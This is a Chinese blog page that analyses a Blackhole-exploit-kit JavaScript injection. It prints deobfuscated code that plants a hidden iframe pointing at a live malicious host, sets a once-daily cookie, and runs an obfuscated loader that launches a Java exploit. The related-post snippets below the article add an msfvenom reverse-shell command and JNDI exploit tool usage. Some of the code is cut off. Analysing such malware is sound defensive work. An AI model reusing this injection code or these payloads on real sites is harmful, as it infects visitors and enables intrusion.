html5hnhn标签,XML注释标签的Javascript恶意注入/重定向(JS/Exploit-Blacole.em)

最新推荐文章于 2024-04-10 13:21:13 发布
最新推荐文章于 2024-04-10 13:21:13 发布
阅读量294 收藏
点赞数
文章标签: html5hnhn标签
本文揭示了代码中使用iframe隐藏的攻击手段,通过实例展示了如何利用cookie调度每日运行的恶意Java代码,包括Iframe加载漏洞和文件执行尝试。同时提到了安全研究人员常用的工具如jsunpack.jeek.org。
摘要由CSDN通过智能技术生成

看看这里

这些工具将帮助您分析代码

这是完整的检索和未经模糊处理的代码:

function r09(){

var static = 'ajax';

var controller = 'index.php';

var r = document.createElement('iframe');

r.src = 'http://ecurie80.hostzi.com/Felenne12/clik.php';

r.style.position = 'absolute';

r.style.color = '6675';

r.style.height = '6675px';

r.style.width = '6675px';

r.style.left = '10006675';

r.style.top = '10006675';

if (!document.getElementById('r')){

document.write('

document.getElementById('r').appendChild(r);

}

}

function SetCookie(cookieName, cookieValue, nDays, path){

var today = new Date();

var expire = new Date();

if (nDays == null || nDays == 0)nDays = 1;

expire.setTime(today.getTime() + 3600000 * 24 * nDays);

document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.

toGMTString() + ((path) ? "; path=" + path : "");

}

function GetCookie(name){

var start = document.cookie.indexOf(name + "=");

var len = start + name.length + 1;

if ((!start) && (name != document.cookie.substring(0, name.length))){

return null;

}

if (start == - 1)return null;

var end = document.cookie.indexOf(";", len);

if (end == - 1)end = document.cookie.length;

return unescape(document.cookie.substring(len, end));

}

if (navigator.cookieEnabled){

if (GetCookie('visited_uq') == 55){

}

else {

SetCookie('visited_uq', '55', '1', '/');

r09();

}

}

此代码创建一个iframe并将其推出视图

代码只使用cookie每天运行一次

http://jsunpack.jeek.org/也是许多安全研究人员使用的很棒的工具(比如Brian Krebs?)

Iframe加载Java漏洞并尝试运行它:

var FPLYKJoQG = {

WdBxtaXWsGnJRm: function (PseXOSDnXPAXRRnkHZs) {

var FIZdpsWVSgyPuFKU = document;

FIZdpsWVSgyPuFKU.write(PseXOSDnXPAXRRnkHZs);

},

wWgsxtVAofesbJwDAY: function (xPTKZBm) {

return xPTKZBm.replace(/355/g, '')

}

};

var SuOmy = FPLYKJoQG.wWgsxtVAofesbJwDAY('355Ja355355355355va355355355355355355355355');

var CHHBPE = z.vvv( SuOmy ).split(',');

var BZTlEHUaD = FPLYKJoQG.wWgsxtVAofesbJwDAY('355355355355j355355355n355355355355355355355355355355355355355355l355p355355355355355355355355355');

var ZNZXaZkfijhQTihemz = FPLYKJoQG.wWgsxtVAofesbJwDAY('355355355355355355355ap355355355355355355355355pl355355355355355355355355355355e355355355355355355t');

if (CHHBPE[1] == 7 && CHHBPE[3] > 9) {

FPLYKJoQG.WdBxtaXWsGnJRm('' + ZNZXaZkfijhQTihemz + '>');

} else {

FPLYKJoQG.WdBxtaXWsGnJRm('' + ZNZXaZkfijhQTihemz + '>');

}

加载d5xs6x0pt9tk85s.jnlp并执行它

或者如果这不可能加载gossip_usually.jar文件并加载/执行wjrqfstrvkwwtlg.qjutgmqhtuypfjlmdspdbj.class:

weixin_39940714
关注
exploit-db图文教程
xiongIT的博客
12-04 3931
ExploitDB 是一个面向全世界黑客的漏洞提交平台,该平台会公布最新漏洞的相关情况,这些可以帮助企业改善公司的安全状况,同时也以帮助安全研究者和渗透测试工程师更好的进行安全测试工作。Exploit-DB 提供一整套庞大的归档体系,其中涵盖了各类公开的攻击事件、漏洞报告、安全文章以及技术教程等资源。
https://www.exploit-db.com/下载POC比较完善的代码
12-21
CVE(Common Vulnerabilities and Exposures)是用于识别安全漏洞的唯一标识,通常与安全补丁或exploit(利用)相关联。下面将详细讨论这些知识点: 1. **自动化下载**: - 通过CVE编号自动化下载代码是一种常见的...
js exploit
p656456564545的专栏
03-09 841
js获取页面的代码 //构建xhrrequest包 function createXHR () { var request = false; if (window.XMLHttpRequest) {     request = new XMLHttpRequest();     if (request.overrideMimeType) {      
Exploit-DB 使用小结
未完成的歌~的博客
09-23 4064
是一个漏洞库网站 ,存储了大量的漏洞利用程序,可以帮助安全研究者和渗透测试工程师更好的进行安全测试工作,目前是世界上公开收集漏洞最全的数据库,该仓库每天都会更新。searchsploit 是一个用于搜索 Exploit-DB 漏洞数据的命令行工具(Kali默认已安装),可以离线搜索 Exploit 数据库,这对于有时候不能联网的渗透工作非常的有用。
【HTML】解决恶意script脚本输入问题
weixin_42973143的博客
02-13 250
HTML script 安全验证**程序永远不可以相信用户的输入。**
渗透与防御技术
热门推荐
YangYubo091699的博客
05-09 2万+
Kali操作系统的基本配置和使用 一、安装 下载KALI操作系统 https://www.kali.org/get-kali/ 二、修改root sudo passwd 三、基本工具介绍 信息搜集工具集: 主要面向网路、端口、服务识别、web指纹等一系列目标信息探测类的工具,常用工具有nmap masscan gobuster (zmap OneForAll) 漏洞分析工具集: 主要面向漏洞的发现、漏洞分析类的工具,漏洞主要面向系统、web、网络设备,常用的工具有 nikto web程序渗透
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip
12-12
标题"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip"暗示了这是一个关于JNDI注入漏洞的exploit工具包,版本为1.0 SNAPSHOT,可能包含了多个利用示例或攻击代码。"all"可能表示该压缩包包含了所有相关的组件或测试...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
整合rmi和ldap服务器+恶意类,使用方法: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , ...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
《深入解析JNDI注入攻击与防御》 Java Naming and Directory Interface (JNDI) 是Java平台中用于访问各种命名和目录服务的API,它提供了一种统一的方式来查找和访问不同类型的网络资源,如数据库、对象、服务器等。...
JNDI-Inject-Exploit
11-04
> 本工具用于解决 Fastjson、log4j2、原生JNDI注入等场景中针对高版本JDK无法加载远程恶意类,通过LDAP服务器返回原生Java反序列化数据,受害者(客户端)在具备反序列化Gadget依赖的情况下可达到命令执行、代码执行...
exploitdb:官方漏洞利用数据库存储库
02-20
漏洞利用数据库Git存储库 这是一个官方的仓库,一个主办。 我们的存储库是: 漏洞和Shellcodes: : 二进制漏洞利用: : 论文: : 漏洞利用数据库是公共漏洞利用和相应的易受攻击软件的存档,专为渗透测试人员和漏洞研究人员使用而开发。 它的目的是作为通过直接提交,邮件列表和其他公共资源收集的, 和的最全面集合,并将它们呈现在可免费使用且易于导航的数据库中。 漏洞利用数据库是漏洞利用和概念验证(而非咨询)的存储库,对于那些立即需要可操作数据的人来说,它是宝贵的资源。 您可以在和了解有关该项目的更多信息。 该存储库每天都会使用最新添加的提交进行更新。 任何其他资源都可以在我们的。 漏洞位于目录中,shellcode位于目录中。 执照 该项目(和SearchSploit)在“ ”下发布。 SearchSploit 该存储库中包含SearchSploit实用程序,使
Exploit_Scripts:漏洞脚本
04-16
Exploit_Scripts Exploit_Scripts 自己修改的一些可以批量利用的EXP脚本,实时更新!
Exploit-DB与相关本地工具的综合运用
最新发布
Kali与编程
04-10 525
例如,在进行web应用渗透时,可能先用Nmap扫描目标网络服务,再结合Burp Suite抓包分析请求响应,找出潜在漏洞点,最后在Exploit-DB中寻找适用的exploit并实施攻击。Exploit-DB作为丰富的漏洞利用资源库,与本地安全工具的紧密结合能够极大提高安全研究和渗透测试的工作效率。以Metasploit Framework为例,这是一个集成开发环境,集成了众多Exploit-DB中的exploit,并提供了图形化和命令行界面,方便用户执行和管理渗透测试任务。二、Exploit-DB简介。
渗透测试思路总结
weixin_33881050的博客
09-15 2089
一、说明 《Metasploit渗透测试魔鬼训练营》等书已经对渗透测试的步骤流程划分得比较合理透彻了,但感觉在多次通读该类书藉之后仍总感觉不得要领----要对一台给定的主机进行渗透还是不懂到底该如何着手。想来主要是存在以下两个问题。 第一个是在渗透操作系统时,最为关键的从漏洞分析到渗透攻击这一步很难跨越。因为按书中漏洞分析基本只有openvas等漏洞扫描器一条途径,漏洞利用只有Metasploit...
searchsploit工具(exploit-db.com)使用实例 (linux 内核漏洞提权) exploitdb
whatday的专栏
10-30 6399
获取 root 权限是 Linux 漏洞利用的终极目标。跟 Windows 中的 System 用户一样,root 用户拥有对操作系统的所有管理权限。在渗透中,有时候成功利用某些漏洞只会获取一个低权限用户,所以需要使用提权技巧,提升到权限更高的 root 用户,完全控制整个系统。 一般来说,获取到低权限 shell 后我们通常会做下面几件事: 1. 检测操作系统的发行版本 2. 查看内核版本 3...
内网渗透笔记——msf
wang_zui_zui的博客
01-22 4753
Masscan 号称五分钟扫遍互联网 性能优越,极限速度 1000w/s,参数 跟nmap 差不多 -p 80,8000-8100 10.0.0.0/24 --max-rate=100000 //发包的极限速度 masscan 0.0.0.0/0 -p 0-65535 //扫描整个互联网的所有端口 不要轻易尝试....... Metasploit(msf) 一旦出现漏洞,出现利用漏洞的方法,则会马上收录——傻瓜式攻击 早期想要利用漏洞——需知道漏洞的poc和exp...
深入探索ExploitDB:网络安全研究者的宝贵资源
gitblog_00032的博客
03-20 460
深入探索ExploitDB:网络安全研究者的宝贵资源 exploitdbThe legacy Exploit Database repository - New repo located at https://gitlab.com/exploit-database/exploitdb项目地址:https://gitcode.com/gh_mirrors/ex/exploitdb 是一个由Offe...
利用 exploit-db 交叉编译 shellcode
YouTheFreedom的博客
09-22 595
shellcode 通用编写方法 获得shellcode一般有如下五种办法: pwntools: asm(shellcraft.arm.linux.sh(),arch=’arm’) msfvenom: msfvenom -p linux/armle/shell/reverse_tcp LHOST=192.168.1.100 LPORT=6666 -f py -o msf.py shell-storm: http://shell-storm.org/shellcode/ exploit-db: https
攻击者对 Exploit-DB平台的利用分析
m0_73803866的博客
10-23 652
我们针对已知的漏洞利用攻击进行了分析,一些常见漏洞利用每个月的攻击趋势如图 3.6 所示,针 对使用 Realtek SDK 的 miniigd SOAP 服务的设备在 2 月到 6 月之间的漏洞利用攻击数最多,峰值在 5 月份,高达 5.4 亿次,这个数值是同月份漏洞利用攻击次数第二高的漏洞的 5 倍。通过绿盟威胁捕获系统,我们共捕获到上百种物联网漏洞的利用行为,攻击者漏洞利用的主要目标 设备类型同样是路由器和摄像头,占比 80% 以上,除此之外,网络存储设备和网络电话设备也逐渐成 为被利用对象。
卡里在git clone https://github.com/Exploit-Labs/sparta.git中无法安装sparta怎么办
04-02
如果无法安装Sparta,可能是由于以下原因: 1. 缺少依赖项:Sparta依赖于许多其他工具和库。请确保您已安装所有必需的依赖项。您可以在Sparta的官方文档中找到完整的依赖列表。 2. 网络问题:如果您无法从GitHub克隆Sparta存储库,则可能是由于网络问题。请确保您的网络连接正常。 3. 权限问题:如果您没有足够的权限来执行安装过程,则可能会出现问题。请确保您具有管理员权限。 以下是一些可能的解决方案: 1. 检查依赖项:检查您是否已安装所有必需的依赖项。如果您缺少某些依赖项,请按照Sparta的官方文档中的说明进行安装。 2. 检查网络连接:确保您的网络连接正常。您可以尝试使用ping命令测试连接。 3. 使用sudo:如果您没有足够的权限,请尝试使用sudo命令。例如,您可以使用以下命令安装Sparta: sudo git clone https://github.com/Exploit-Labs/sparta.git 如果您仍然无法安装Sparta,请尝试在Sparta的GitHub问题部分中搜索您的问题,或提交问题请求以获取更多帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值